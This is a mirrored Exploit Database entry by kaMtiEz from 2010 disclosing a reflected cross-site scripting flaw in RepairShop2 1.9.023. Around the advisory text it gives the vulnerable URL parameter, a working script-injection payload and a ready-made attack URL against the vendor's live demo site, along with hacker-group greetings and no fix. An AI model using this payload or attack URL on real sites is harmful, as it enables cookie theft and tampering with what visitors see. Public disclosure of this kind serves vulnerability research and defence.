RepairShop2 – ‘index.php?Prod’ Cross-Site Scripting

• Exploit Database
• 82 阅读

• 作者： kaMtiEz
  日期： 2010-03-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/33787/

• source: https://www.securityfocus.com/bid/38907/info
  
  RepairShop 2 is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.
  
  Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  
  RepairShop 2 1.9.023 Trial is vulnerable; other versions may also be affected.
  
  #############################################################################################################
  ## RepairShop2 - cross site scripting ( XSS )	 ##
  ## Author : kaMtiEz (kamzcrew@yahoo.com)								 ##
  ## Homepage : http://www.indonesiancoder.com	 						 ##
  ## Date : 20 March, 2010 						 ##
  #############################################################################################################
  
  [ Software Information ]
  
  [+] Vendor : http://www.realitymedias.com/
  [+] Download : http://www.realitymedias.com/repairshop/?L=downloads
  [+] version : 1.9.023
  [+] Vulnerability : XSS
  [+] Dork : syalalala
  [+] LOCATION : INDONESIA - JOGJA
  #############################################################################################################
  
  [ Vulnerable File ]
  
  http://127.0.0.1/[kaMtiEz]/shop/?b=products.details&prod=[INDONESIANCODER]
  
  [ EXPLOIT ]
  
  "><script>alert(666)</script>
  
  [ DEMO ]
  
  http://n3x.realitymedias.com/rshop_demo/shop/?b=products.details&prod="><script>alert(666)</script>
  
  [ FIX ]
  
  :(
  
  
  #############################################################################################################
  
  [ Thx TO ]
  
  [+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
  [+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack,senot
  [+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
  [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31
  
  
  [ NOTE ] 
  
  [+] Babe enyak adek i love u pull dah .. 
  [+] to someone .. satu langkah lagi .. :D
  [+] CS-31 : kutunggu di kotaku :">
  
  [ QUOTE ]
  
  [+] INDONESIANCODER still r0x
  [+] nothing secure ..
  

  Python

  Copy